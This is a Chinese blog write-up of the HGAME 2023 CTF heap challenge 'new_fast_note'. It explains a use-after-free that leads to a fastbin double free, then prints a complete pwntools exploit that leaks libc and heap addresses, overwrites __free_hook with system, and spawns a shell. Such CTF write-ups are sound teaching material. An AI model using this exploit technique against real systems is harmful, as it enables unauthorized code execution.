HGAME 2023 new_fast_note

最新推荐文章于 2024-07-12 16:16:27 发布
最新推荐文章于 2024-07-12 16:16:27 发布
阅读量220 收藏
点赞数
文章标签: python 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/133359490
版权

在这里插入图片描述
普通菜单堆题
在这里插入图片描述
free函数下存在uaf
因为无编辑功能,所以无法绕过被释放堆块的key字段,要达成doublefree可以将申请多个堆块释放到fastbin上面构造成A->B->A完成利用
在这里插入图片描述
成功doublefree
接下来就很简单了2.31 几个常用hook还在还可以利用
解题脚本

from pwn import *

context.arch = 'amd64'

def gd():
 gdb.attach(p)
 pause()
def add(idx,size,data):
 p.recvuntil(b'>')
 p.sendline(b'1')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
 p.recvuntil(b'Size: ')
 p.sendline(str(size).encode())
 p.recvuntil(b'Content: ')
 p.send(data)
def free(idx):
 p.recvuntil(b'>')
 p.sendline(b'2')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
def show(idx):
 p.recvuntil(b'>')
 p.sendline(b'3')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
p = process("./pwn") 
#p = remote('node5.anna.nssctf.cn',28438)
libc = ELF("./libc-2.31.so")
for i in range(9):
 add(i,0x80,b'1')
for i in range(8):
 free(i)
show(7) 
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x1ecb80 - 96
print(hex(libc_base))
add(0,0x20,b'aaaaaaaa') 
add(1,0x20,b'aaaaaaaa') 
free(0)
free(1)
show(1)
heap_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x3f0
print(hex(heap_base))
for i in range(2,11):
 add(i,0x20,b'a' * 0x10)
for i in range(2,11):
 free(i)
free(9) 

for i in range(7):
 add(0,0x20,b'a')
free_hook = libc_base + libc.sym['__free_hook']
sys_addr = libc_base + libc.sym['system'] 
add(1,0x20,p64(free_hook))
add(2,0x20,p64(sys_addr)) 
add(2,0x20,p64(sys_addr))
add(2,0x20,p64(sys_addr))
add(3,0x40,b'/bin/sh\x00')
free(3)

#gd()

p.interactive()

成功getshell
在这里插入图片描述

萌の鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
Hgame-2023(前三周pwn题解)
weixin_73290593的博客
02-01 1155
hgame,真好玩
2023 HGAME网络攻防大赛wp
m0_67837149的博客
01-22 1336
2023 HGAME网络攻防大赛wp
HGAME 2023 Week1
ph0ebus的博客
01-13 2234
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
HGAME2023部分WP
网安菜鸡学习笔记
02-03 106
Search Commodity 爆破密码admin123 登录进去, Designer app.post("/button/share", auth, async (req, res) => { const browser = await puppeteer.launch({ headless: true, executablePath: "/usr/bin/chro...
[Hgame2023]patchme--keypatch二进制漏洞/smc代码保护
can_no_volcano的博客
05-07 282
所以对这两处进行patch由于gets 函数的读取效果为读取缓冲区内的所有字符,并将末尾的换 ⾏符换成\0,因此我们考虑将其 patch 为 scanf("%23s",format )的形式,注意这⾥是 23 ⽽不是24。当初做的时候听说第一种解法很难,于是跟着佬用第二种解法逆了出来,但是处于好奇,去学了一下第一种keypatch解法。既然是为了解决二进制漏洞,那就需要知道有哪些二进制漏洞,此题有两种二进制漏洞:gets的栈溢出和printf的格式化输出字符。而对于printf只需加上“%23s”就行了。
hgame:Haskell 游戏引擎
05-30
【Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
0hgame:用0h制作的游戏->阅读README
05-01
0h游戏卡纸我在2014年10月26日凌晨02:00开始了这个项目,并在2014年10月26日凌晨02:00完成了该项目。 没有时间的游戏? 是的! 好好享受! (对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club...
html5game.co.kr:添加基本​​文件
07-01
HTML5游戏开发是一个充满活力的领域,特别是在JavaScript的加持下,开发者可以构建出跨平台、交互性强的游戏。... ... ...它是一门轻量级的脚本语言,易于学习且支持事件驱动和函数式编程。...开发者可以通过DOM(文档对象模型...
HGame 2023 Week2 部分Writeup
vvbbnn00的专栏
01-19 3364
第二周的解题过程中,遇到的不少有意思的题目,同时,也学习到了不少的知识,故书写此题解,作为记录。 Week2 比赛地址:https://hgame.vidar.club/contest/3
2023 hgame --- week1 wp
3tefanie丶zhou的博客
01-13 2906
【何谓遗憾,不可再得之物,不可再遇之人,便是遗憾】
Hgame-WP 2023 部分题解
DoubleLiii的博客
02-01 296
题解
hgame2023-week3
247533的博客
02-01 867
过年 打麻将 摆烂。
2023HGAME week1 部分wp
arcuied
01-18 411
2023HGAME week1 部分wp
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 103
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 743
Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 658
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2324
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
hgamewriteup
03-01
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值